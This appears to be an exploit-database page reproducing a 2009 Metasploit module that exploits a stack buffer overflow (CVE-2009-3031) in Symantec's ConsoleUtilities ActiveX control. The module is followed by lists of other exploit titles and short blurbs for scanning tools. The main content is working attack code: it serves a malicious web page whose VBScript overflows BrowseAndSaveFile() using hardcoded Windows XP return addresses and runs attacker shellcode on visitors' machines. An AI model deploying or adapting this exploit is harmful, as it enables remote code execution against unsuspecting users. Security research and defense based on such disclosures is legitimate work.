Menu

Search for hundreds of thousands of exploits

"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)"

Author

Exploit author

"Nikolas Sotiriu"

Platform

Exploit platform

windows

Release date

Exploit published date

2009-11-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
## 
# Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

        include Msf::Exploit::Remote::HttpServer::HTML

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in Symantecs ConsoleUtilities.
                                        By sending an overly long string to the "BrowseAndSaveFile()" method located
                                        in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
                                        execute arbitrary code.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         => [ 'Nikolas Sotiriu (lofi)' ],
                        'Version'        => '1.0',
                        'References'     =>
                                [
                                        [ 'CVE', '2009-3031'],
                                        [ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],
                                        [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00' ],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'         => 1000,
                                        'BadChars'      => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
					[ 'Windows XP SP2 Universal',	    { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP
					[ 'Windows XP SP2 Pro German',      { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP
					[ 'Windows XP SP3 Pro German',      { 'Ret' => 0x7E6830D7 } ], # SHELL32.dll JMP ESP
                                ],
                        'DisclosureDate' => 'Nov 02 2009',
                        'DefaultTarget'  => 0))
        end

        def autofilter
                        false
        end

        def check_dependencies
                        use_zlib
        end

        def on_request_uri(cli, request)
                # Re-generate the payload
                return if ((p = regenerate_payload(cli)) == nil)

                # Randomize variables
                vname   = rand_text_alpha(rand(20) + 1)
                junk    = rand_text_alpha(rand(20) + 1)
                eip     = rand_text_alpha(rand(20) + 1)
                morejunk = rand_text_alpha(rand(20) + 1)
                sc      = rand_text_alpha(rand(20) + 1)
                buf = rand_text_alpha(rand(20) + 1)


                # Set RET and shellcode
                ret = Rex::Text.to_unescape([target.ret].pack('V'))
                shellcode = Rex::Text.to_unescape(p.encoded)

                # Build the Site
                content = %Q|
                        <html>
                        <object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='#{vname}'></object>
                        <script language='vbscript'>
                        arg1 = ""
                        arg3 = ""
                        arg4 = ""
                        arg5 = ""

                        #{junk}=String(310, "A")
                        #{eip}=unescape("#{ret}")
                        #{morejunk}=String(18, unescape("%u0041"))
                        #{sc}=unescape("#{shellcode}")

                        #{buf}=#{junk}+#{eip}+#{morejunk}+#{sc}
                        #{vname}.BrowseAndSaveFile arg1,#{buf},arg3,arg4,arg5
                        </script>
                        </html>
                  |

                print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

                # Transmit the response to the client
                send_response_html(cli, content)

                # Handle the payload
                handler(cli)
        end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2013-01-18 "SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass" webapps multiple "Nikolas Sotiriu"
2013-01-18 "SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution" webapps multiple "Nikolas Sotiriu"
2011-03-23 "Symantec LiveUpdate Administrator Management GUI - HTML Injection" webapps windows "Nikolas Sotiriu"
2010-08-27 "McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution" webapps linux "Nikolas Sotiriu"
2010-08-19 "SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow" dos windows "Nikolas Sotiriu"
2010-03-04 "Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities" remote windows "Nikolas Sotiriu"
2009-11-02 "Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)" remote windows "Nikolas Sotiriu"
2009-10-20 "Websense Email Security - Cross-Site Scripting" webapps hardware "Nikolas Sotiriu"
2009-10-20 "Websense Email Security - Denial of Service" dos hardware "Nikolas Sotiriu" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected